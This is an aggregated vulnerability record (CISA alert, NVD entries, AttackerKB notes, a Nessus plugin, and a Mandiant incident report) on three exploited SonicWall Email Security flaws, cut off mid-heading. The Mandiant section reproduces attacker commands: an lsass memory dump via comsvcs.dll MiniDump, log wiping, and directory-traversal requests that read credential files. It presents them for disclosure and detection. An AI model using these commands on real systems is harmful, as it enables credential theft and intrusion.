{"id": "CISA:A649FC04AF073ED0C72E2D0A372F841B", "type": "cisa", "bulletinFamily": "info", "title": "SonicWall Releases Patches for Email Security Products", "description": "CISA is aware of three vulnerabilities affecting SonicWall Email Security products: [CVE-2021-20021](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20021 >), [CVE-2021-20022](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20022 >), and [CVE-2021-20023](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20023>). A remote attacker could exploit these vulnerabilities to take control of an affected system. According to SonicWall, \"In at least one known case, these vulnerabilities have been observed to be exploited \u2018in the wild.\u2019\"\n\nCISA encourages users and administrators to review the SonicWall [security advisory](<https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ >) and apply the necessary update as soon as possible. Note: SonicWall released patches for CVE-2021-20021 and CVE-2021-20022 on April 9, 2021, and for CVE-2021-20023 on April 20, 2021.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/04/21/sonicwall-releases-patches-email-security-products>); we'd welcome your feedback.\n", "published": "2021-04-21T00:00:00", "modified": "2021-04-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/04/21/sonicwall-releases-patches-email-security-products", "reporter": "CISA", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20021", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20022", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20023", "https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/"], "cvelist": ["CVE-2021-20021", "CVE-2021-20022", "CVE-2021-20023"], "immutableFields": [], "lastseen": "2021-04-21T18:06:55", "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20021", "CVE-2021-20023", "CVE-2021-20022"]}, {"type": "attackerkb", "idList": ["AKB:D0A6DBAF-BB93-4A5E-902A-F0C3BE2FB4E1"]}, {"type": "thn", "idList": ["THN:59B93BC2ED5871A43456C803DE0C2990"]}, {"type": "nessus", "idList": ["SONICWALL_ES_10_0_9.NASL"]}, {"type": "fireeye", "idList": ["FIREEYE:F52E9D08724DC89168C734FC17EBF034", "FIREEYE:9CF80EFF287EE06F7EC0094727FE9C26"]}], "modified": "2021-04-21T18:06:55", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-04-21T18:06:55", "rev": 2}, "vulnersScore": 5.8}, "wildExploited": false}

{"cve": [{"lastseen": "2021-04-28T11:49:16", "description": "SonicWall Email Security version 10.0.9.x contains a vulnerability that allows a post-authenticated attacker to read an arbitrary file on the remote host.", "edition": 1, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-04-20T12:15:00", "title": "CVE-2021-20023", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20023"], "modified": "2021-04-23T20:16:00", "cpe": ["cpe:/a:sonicwall:email_security:10.0.9"], "id": "CVE-2021-20023", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20023", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sonicwall:email_security:10.0.9:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-28T11:49:16", "description": "SonicWall Email Security version 10.0.9.x contains a vulnerability that allows a post-authenticated attacker to upload an arbitrary file to the remote host.", "edition": 3, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-09T18:15:00", "title": "CVE-2021-20022", "type": "cve", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20022"], "modified": "2021-04-14T15:27:00", "cpe": [], "id": "CVE-2021-20022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20022", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-04-28T11:49:16", "description": "A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-09T18:15:00", "title": "CVE-2021-20021", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20021"], "modified": "2021-04-14T16:04:00", "cpe": [], "id": "CVE-2021-20021", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20021", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "attackerkb": [{"lastseen": "2021-05-07T00:18:49", "bulletinFamily": "info", "cvelist": ["CVE-2021-20021"], "description": "A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 28, 2021 11:04pm UTC reported:\n\n[CVE-2021-20021](<https://nvd.nist.gov/vuln/detail/CVE-2021-20021>) is being [exploited in the wild](<https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html>) to gain admin access to SonicWall Email Security appliances. RCE typically follows.\n\nThe vulnerable endpoint `/createou` is implemented as follows:\n \n \n <servlet-mapping>\n <servlet-name>createou</servlet-name>\n <url-pattern>/createou</url-pattern>\n </servlet-mapping>\n \n \n \n <servlet>\n <servlet-name>createou</servlet-name>\n <servlet-class>com.mailfrontier.msgcenter.app.api.hosted.ActivateAccount</servlet-class>\n <init-param>\n <param-name>Method</param-name>\n <param-value>ActivateHES</param-value>\n </init-param>\n <load-on-startup>1</load-on-startup>\n </servlet>\n \n \n \n public void doBoth(HttpServletRequest request, HttpServletResponse response) throws IOException {\n Log.info(\"Request received to create OU.\");\n String inputXML = request.getParameter(\"data\");\n String methodName = getInitParameter(\"Method\");\n \n if (null == inputXML) {\n inputXML = readRequest(request);\n }\n \n if (StringUtil.isEmpty(inputXML)) {\n String str = HostedConfigurationManager.generateResponseXML(\"FAILURE\", methodName, \"100\", \"Input XML is empty.\");\n sendResonse(str, response);\n \n return;\n }\n HostedConfigurationManager hostedMgr = new HostedConfigurationManager();\n \n String outputXML = null;\n if (\"ActivateHES\".equals(methodName)) {\n outputXML = hostedMgr.createAccount(inputXML, request.getLocale());\n }\n else if (\"DeleteHES\".equals(methodName)) {\n outputXML = hostedMgr.deleteOUAccount(inputXML);\n }\n else if (\"ResetPasswordHES\".equals(methodName)) {\n outputXML = hostedMgr.resetOUPassword(inputXML);\n }\n else if (\"ActivateServiceHES\".equals(methodName)) {\n outputXML = hostedMgr.activateService(inputXML);\n } else {\n return;\n }\n \n \n sendResonse(outputXML, response);\n }\n \n\nAnd here\u2019s how you can check for the vuln:\n \n \n wvu@kharak:~$ curl -v http://192.168.123.250/createou -d data=\n * Trying 192.168.123.250...\n * TCP_NODELAY set\n * Connected to 192.168.123.250 (192.168.123.250) port 80 (#0)\n > POST /createou HTTP/1.1\n > Host: 192.168.123.250\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Length: 5\n > Content-Type: application/x-www-form-urlencoded\n >\n * upload completely sent off: 5 out of 5 bytes\n < HTTP/1.1 200\n < pragma: public\n < Cache-Control: public\n < Content-Type: text/xml\n < Content-Length: 280\n < Date: Wed, 28 Apr 2021 07:46:54 GMT\n <\n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <RESPONSE>\n <COMPONENT>HOSTEDES</COMPONENT>\n <METHOD>ActivateHES</METHOD>\n <OUTPUT_XML>\n <RESPONSESTATUS>FAILURE</RESPONSESTATUS>\n <ERRORNUMBER>100</ERRORNUMBER>\n <ERRORDESCRIPTION>Input XML is empty.</ERRORDESCRIPTION>\n </OUTPUT_XML>\n </RESPONSE>\n * Connection #0 to host 192.168.123.250 left intact\n * Closing connection 0\n wvu@kharak:~$\n \n\nThe following XML strings are particularly significant:\n\n * `<COMPONENT>HOSTEDES</COMPONENT>` \n\n * `<METHOD>ActivateHES</METHOD>` \n\n * `<ERRORDESCRIPTION>Input XML is empty.</ERRORDESCRIPTION>`\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2021-04-15T00:00:00", "id": "AKB:D0A6DBAF-BB93-4A5E-902A-F0C3BE2FB4E1", "href": "https://attackerkb.com/topics/jU2S5QIv0u/cve-2021-20021", "published": "2021-04-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-20021", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-04-30T11:59:28", "description": "According to its self-reported version, the remote SonicWall Email Security is affected by multiple vulnerabilities:\n\n - A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative \n account by sending a crafted HTTP request to the remote host. (CVE-2021-20021)\n\n - SonicWall Email Security version 10.0.9.x contains a vulnerability that allows a post-authenticated attacker to upload \n an arbitrary file to the remote host. (CVE-2021-20022)\n\n - SonicWall Email Security version 10.0.9.x contains a vulnerability that allows a post-authenticated attacker to read \n an arbitrary file on the remote host. (CVE-2021-20023)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-04-28T00:00:00", "title": "SonicWall Email Security 10.0.x < 10.0.9.6173 / 6177 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-20023", "CVE-2021-20022", "CVE-2021-20021"], "modified": "2021-04-28T00:00:00", "cpe": ["cpe:/a:sonicwall:email_security_appliance"], "id": "SONICWALL_ES_10_0_9.NASL", "href": "https://www.tenable.com/plugins/nessus/149047", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149047);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/29\");\n\n script_cve_id(\"CVE-2021-20021\", \"CVE-2021-20022\", \"CVE-2021-20023\");\n\n script_name(english:\"SonicWall Email Security 10.0.x < 10.0.9.6173 / 6177 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote SonicWall Email Security is affected by multiple vulnerabilities:\n\n - A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative \n account by sending a crafted HTTP request to the remote host. (CVE-2021-20021)\n\n - SonicWall Email Security version 10.0.9.x contains a vulnerability that allows a post-authenticated attacker to upload \n an arbitrary file to the remote host. (CVE-2021-20022)\n\n - SonicWall Email Security version 10.0.9.x contains a vulnerability that allows a post-authenticated attacker to read \n an arbitrary file on the remote host. (CVE-2021-20023)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?218b685b\");\n # https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0007\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b68bb26e\");\n # https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7c24e3d\");\n # https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0009\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aab2b0d6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 10.0.9.6173 or later for Windows, or 10.0.9.6177 or later for Appliance.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20021\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sonicwall:email_security_appliance\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sonicwall_email_security_detect.nbin\");\n script_require_keys(\"installed_sw/SonicWall Email Security\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp_name = 'SonicWall Email Security';\nport = get_http_port(default:443,embedded:TRUE);\napp = vcf::get_app_info(app:app_name, webapp:TRUE, port:port);\n\n# fixed version depends on windows / appliance flavour\n# customising fixed_display as well to emphasize affected flavour and avoid confusion\nif ('Windows' >< app['Model'])\n{\n fixed_version = '10.0.9.6173';\n fixed_display = 'SonicWall ES (Windows) version ' + fixed_version + ' or later.';\n}\nelse\n{\n fixed_version = '10.0.9.6177';\n fixed_display = 'SonicWall ES (Appliance) version ' + fixed_version + ' or later.';\n}\n\nconstraints =\n[\n {'min_version' : '10.0.1', 'fixed_version' : fixed_version, 'fixed_display':fixed_display}\n];\n\nvcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-04-28T20:30:11", "bulletinFamily": "info", "cvelist": ["CVE-2021-20021", "CVE-2021-20022", "CVE-2021-20023"], "description": "In March 2021, Mandiant Managed Defense identified three zero-day vulnerabilities in SonicWall\u2019s Email Security (ES) product that were being exploited in the wild. These vulnerabilities were executed in conjunction to obtain administrative access and code execution on a SonicWall ES device. The adversary leveraged these vulnerabilities, with intimate knowledge of the SonicWall application, to install a backdoor, access files and emails, and move laterally into the victim organization\u2019s network.\n\nThe vulnerabilities are being tracked in the following CVEs:\n\nCVE-2021-20021\n\n| \n\n9.8\n\n| \n\nUnauthorized administrative account creation \n \n---|---|--- \n \nCVE-2021-20022\n\n| \n\n7.2\n\n| \n\nPost-authentication arbitrary file upload \n \nCVE-2021-20023\n\n| \n\n4.9\n\n| \n\nPost-authentication arbitrary file read \n \nMandiant has been coordinating with the SonicWall Product Security and Incident Response Team (PSIRT) for the responsible disclosure of this information. SonicWall advises all customers and partners to upgrade to the 10.0.9.6173 Hotfix for Windows users, and the 10.0.9.6177 Hotfix for hardware and ESXi virtual appliance users. SonicWall Hosted Email Security product was automatically updated for all customers and no additional action is required for patching purposes. The hotfixes will also be superseded by the upcoming SonicWall ES 10.0.10 release.\n\nMore information can be found by visiting the [KB article](<https://www.sonicwall.com/support/product-notification/?sol_id=210416112932360>) published by SonicWall.\n\nAll patches, upgrades, and hotfixes are available to download on the [MySonicWall site](<https://www.mysonicwall.com/muir/login>).\n\n#### Overview\n\n \nFigure 1: SonicWall Email Security ecosystem overview (via [SonicWall](<mysonicwall.com>))\n\nSonicWall Email Security (ES) is an email security solution that \u201c[provides comprehensive inbound and outbound protection, and defends against advanced email-borne threats such as ransomware, zero-day threats, spear phishing and business email compromise (BEC)](<https://www.sonicwall.com/products/secure-email/email-security-appliance/>).\u201d The solution can be deployed as a physical appliance, virtual appliance, software installation, or a hosted SaaS solution.\n\n \nFigure 2: Sample SonicWall Email Security login page\n\nLike many appliances, the solution provides a rich, web-accessible administrative interface that serves as the main avenue for product configuration. Depending on the customer\u2019s deployment method, this software is potentially capable of running under Windows or Unix because it heavily leverages OS-independent Apache Tomcat and Java. While the solution doesn\u2019t require that this interface be exposed to the internet, internet-wide scanning shows approximately 700 publicly reachable interfaces.\n\n#### Investigation\n\nIn March 2021, Mandiant Managed Defense identified post-exploitation web shell activity on an internet-accessible system within a customer\u2019s environment. Managed Defense isolated the system and collected evidence to determine how the system was compromised.\n\nThe system was quickly identified as a SonicWall Email Security (ES) application running on a standard Windows Server 2012 installation. The adversary-installed web shell was being served through the HTTPS-enabled Apache Tomcat web server bundled with SonicWall ES. Due to the web shell being served in the application\u2019s bundled web server, we immediately suspected the compromise was associated with the SonicWall ES application itself.\n\nWhen we contacted the customer, we learned that the installation of SonicWall ES was the latest version available for download (10.0.9) and that there was no publicly available information pertaining to vulnerabilities or in-the-wild exploitation. To determine if a potential application-level vulnerability was exploited to install the web shell, Mandiant collected endpoint telemetry data.\n\nWe soon identified post-exploitation activity aimed at destroying evidence on the system, executed in the context of the web shell. The adversary executed the following command, shortly after installing the web shell:\n\ncmd.exe /c \"echo \"\" &gt; \"C:/Program Files (x86)/SonicWallES/logs/webUI/webui.json \n \n--- \n \nFigure 3: The Adversary clearing existing entries in the current \u201cwebui.json\u201d log\n\nThis command deleted the most recent application-level log entries recorded by the SonicWall ES web application. While clearing log files is a standard anti-forensics technique, understanding the location of internal log files generated by applications is usually overlooked by most spray-and-pray attackers. This added fuel to our suspicion that we were dealing with an adversary who had intimate knowledge of how the SonicWall ES application worked.\n\nFortunately for us, additional log files and a previously created virtual server snapshot provided enough evidence to track down the vulnerabilities and the adversary\u2019s activities on the host.\n\n#### Vulnerabilities\n\n##### CVE-2021-20021\n\n_Unauthenticated administrative access through improperly secured API endpoint_\n\nThe SonicWall Email Security application contains an authenticated control panel to provide administration capabilities. One feature available allows application administrators to authorize an additional administrator account from a separate Microsoft Active Directory Organization Unit (AD OU).\n\nhttps://&lt;SonicWall ES host&gt;/createou?data=&lt;XML HERE&gt; \n \n--- \n \nFigure 4: A redacted example of the vulnerable endpoint associated with arbitrary user creation\n\nRequests to this form, however, were not verified to require previous authentication to the appliance.\n\nDue to this vulnerability, an adversary with a well-crafted XML document could either GET or POST their document to the application and create a \u201crole.ouadmin\u201d account (Figure 4). This account could then be used to authenticate to the application as an administrator.\n\n##### CVE-2021-20022\n\n_Arbitrary file upload through post-authenticated \u201cbranding\u201d feature_\n\nLike many enterprise products with a web-based user interface, SonicWall Email Security includes a feature known as \"branding\" which gives administrators the ability to customize and add certain assets to the interface, such as company logos. These branding assets are managed via packages, and new packages can be created by uploading ZIP archives containing custom text, image files, and layout settings. A lack of file validation can enable an adversary to upload arbitrary files, including executable code, such as web shells.\n\nOnce uploaded, these branding package ZIP archives are normally expanded and saved to the &lt;SonicWall ES install path&gt;\\data\\branding directory. However, an adversary could place malicious files in arbitrary locations, such as a web accessible Apache Tomcat directory, by crafting a ZIP archive containing a file within a sequence of directory traversal notations such as in Figure 5.\n\n \nFigure 5: Example ZIP archive containing a Zip Slip web shell\n\nIt is important to note that the lack of validation which enables Zip Slip attacks is not unique to SonicWall Email Security. As detailed in [Snyk's research on the topic](<https://snyk.io/research/zip-slip-vulnerability>), they exist within the many code libraries from which applications have been built.\n\n##### CVE-2021-20023\n\n_Directory-traversal leads to arbitrary file read in post-authenticated \"branding\" feature_\n\nMandiant confirmed another post-authentication vulnerability in the administrative panel\u2019s built-in \"branding\" feature which allowed an adversary to retrieve arbitrary files from the host by sending crafted HTTP GET requests to a particular resource. Figure 6 demonstrates the formatting of such request.\n\nhttps://&lt;SonicWall ES host&gt;/dload_apps?action=&lt;any value&gt;&amp;path=..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fcalc.exe&amp;id=update \n \n--- \n \nFigure 6: An example web request which results in downloading the Windows calculator\n\nWhile the working directory of this branding feature is &lt;SonicWall ES install path&gt;\\data\\updates, a directory-traversal vulnerability allows an adversary to access files located outside of this directory. As the Apache Tomcat webserver handling this request is operating as the NT AUTHORITY\\SYSTEM account, any file on the operating system can be accessed.\n\nCombinations of all three exploits were leveraged interchangeably by the adversary to perform the following actions:\n\n 1. Creation of a new Administrator account on the SonicWall ES device\n 2. Exposure of the hashed passwords for existing, locally configured Administrative accounts\n 3. The creation of a web shell in an arbitrary directory\n 4. Real-time debugging of exploitation success and failure\n\n#### Post-Exploitation\n\nUpon obtaining administrative access to the appliance through CVE-2021-20021, an adversary sent crafted HTTP requests to the resource /dload_apps, a component of the application's \"branding\" feature, exploiting CVE-2021-20023. These requests leveraged directory traversal attacks, enabling access to two sensitive XML configuration files located at &lt;SonicWall ES install path&gt;\\data\\multi_accounts.xml and &lt;SonicWall ES install path&gt;\\data\\multi_ldap.xml, respectively (Figure 7).\n\nGET /dload_apps?action=REDACTED&amp;path=..%2Fmulti_accounts.xml&amp;id=update\n\nGET /dload_apps?action=REDACTED&amp;path=..%2Fmulti_ldap.xml&amp;id=update \n \n--- \n \nFigure 7: HTTP GET requests exploiting CVE-2021-20023\n\nThese files contained details about existing accounts as well as Active Directory credentials used by the application.\n\nNext, the adversary uploaded a ZIP archive containing the BEHINDER JSP web shell from the administrative panel's \"branding\" page. The crafted ZIP archive used a Zip Slip attack to exploit CVE-2021-20022, which caused the web shell to be written to the web-accessible Apache Tomcat directory &lt;SonicWall ES install path&gt;\\Apache Software Foundation\\Tomcat 9.0\\webapps\\SearchEngineRMIService\\.\n\nBEHINDER is a publicly available, multi-platform web shell that accepts encrypted command and control (C2) communications. In principle, BEHINDER operates similarly to CHINA CHOPPER, a popular web shell that has been previously detailed by FireEye. Like CHINA CHOPPER, an adversary operates a client-side application to pass commands to the web shell within the body of HTTP requests. As the core functionality of the backdoor is contained within the client-side application, BEHINDER\u2014much like CHINA CHOPPER\u2014has the added benefit of being small, with the variant observed in this investigation weighing in at less than 1 kilobyte (Figure 8).\n\n \nFigure 8: The BEHINDER web shell observed by Mandiant, which executes AES encrypted and base64 encoded commands\n\nWith the addition of a web shell to the server, the adversary had unrestricted access to the command prompt, with the inherited permissions of the NT AUTHORITY\\SYSTEM account.\n\nAfter clearing the SonicWall application \u201cwebui.json\u201d log file, the adversary escalated their attack to credential harvesting in preparation of moving laterally into the victim's network. The adversary relied on \u201cliving off the land\u201d techniques rather than bringing their own tools into the environment, which often has the benefit of potentially avoiding detections from a security product.\n\nWe observed the adversary executing the reg save command to dump the HKLM\\SAM, HKLM\\SYSTEM, and HKLM\\SECURITY registry hives, which contain vital information in recovering password hashes and LSA secrets. Additionally, the adversary obtained in-memory sensitive credentials through the use of built-in memory dumping techniques. The adversary was observed invoking the MiniDump export of the Windows DLL comsvcs.dll to dump both the process memory for lsass.exe and the running instance of Apache Tomcat as seen in Figure 9.\n\nrundll32.exe C:\\windows\\system32\\comsvcs.dll, MiniDump &lt;lsass PID&gt; c:\\windows\\temp\\TS_LAS.dmp full\n\nrundll32.exe C:\\windows\\system32\\comsvcs.dll MiniDump &lt;Tomcat PID&gt; C:\\windows\\temp\\TS_FF9DG.dmp full \n \n--- \n \nFigure 9: The adversary acquiring process memory for lsass.exe (MITRE ATT&amp;CK T1003.001) and Apache Tomcat\n\nMandiant typically observes adversaries employing short and easy-to-type filenames during their operations, simply for efficiency. As such, the aforementioned filenames initially stood out as being peculiar, as a mix of case and symbols would require more effort to type than is often necessary. While this could always be indicative of a tool being used, the slight variations between the two commands\u2014the absence of a comma before the DLL export and the uppercase C:\\ drive in the second\u2014suggest that they were manually typed. Considering that the C:\\Windows\\Temp\\ directory on a Windows host also normally contains numerous similarly named temporary files, the adversary was likely taking extra care to evade suspicion should the activity reach the screen of a security analyst.\n\nContinuing their effort to live off the land as much as possible, the adversary located a copy of the archiving utility 7-Zip already present on the host and used it to compress a subdirectory of &lt;SonicWall ES install path&gt;\\data\\archive\\. This directory contains daily archives of emails processed by SonicWall ES\u2014again demonstrating the adversary\u2019s familiarity with the application.\n\nAfter a several-day lull in activity, the adversary returned to the host, presumably after working to recover passwords from the registry hives and process memory that was dumped earlier. At the time of activity, the victim organization was using the same local Administrator password across multiple hosts in their domain, which provided the adversary an easy opportunity to move laterally under the context of this account\u2014highlighting the value of randomizing passwords to built-in Windows accounts on each host within a domain.\n\nWe observed the adversary leveraging Impacket\u2019s publicly available [WMIEXEC.PY](<https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py>) tool to access several internal hosts, which enabled remote command execution over Microsoft's DCOM protocol via Windows Management Instrumentation (WMI). The adversary managed to briefly perform internal reconnaissance activity prior to being isolated and removed from the environment.\n\n#### Attribution\n\nMandiant currently tracks this activity as UNC2682. Ultimately, Mandiant prevented UNC2682 from completing their mission so their objectives of the attack currently remain unknown.\n\nEach investigation conducted by Mandiant includes analysts from our Advanced Practices team who work to correlate activity observed in the thousands of investigations that Mandiant responds to. At times, we do not have the data available to directly attribute intrusion activity to a previously known group. In these cases, we create a new UNC group to track the activity that we observed. An UNC group is a cluster of related cyber intrusion activity, which includes observable artifacts such as adversary infrastructure, tools, and tradecraft, that we are not yet ready to give a classification such as APT or FIN.\n\nFor more details on how Mandiant uses UNC groups, see our blog post: DebUNCing Attribution: How Mandiant Tracks Uncategorized Threat Actors.\n\n#### Investigation &amp; Monitoring Tips\n\nMandiant recommends monitoring of the following endpoint telemetry indicators for potential evidence of compromise:\n\n * Child processes of the web server process \u201ctomcat\u201d on SonicWall Email Security appliances, particularly cmd.exe\n * The creation or existence of web shells on a server hosting SonicWall Email Security\n\nIn addition to standard indicators, Mandiant recommends reviewing SonicWall-related internal configuration files and logs for evidence of previous adversary activity.\n\nEvidence of malicious web requests and their values may be identifiable in the following log files:\n\n 1. The Apache Tomcat logs:\n * C:\\Program Files\\SonicWallES\\Apache Software Foundation\\Tomcat 9.0\\logs\n 2. The SonicWall application logs:\n * C:\\Program Files\\SonicWallES\\logs\\webUI\\webui.json\n\nEvidence of unauthorized modifications to SonicWall configuration settings can be confirmed in the following files:\n\n 1. The administration user account file:\n * C:\\Program Files\\SonicWallES\\data\\multi_accounts.xml\n 2. Additional user account files that may have been created in the following directories:\n * C:\\Program Files\\SonicWallES\\data\\perhost\n * C:\\Program Files\\SonicWallES\\data\\perldap\n * C:\\Program Files\\SonicWallES\\data\\perou\n 3. Branding related zip files in any of the subdirectories of the following directory:\n * C:\\Program Files\\SonicWallES\\data\\branding\n\n#### Detecting the 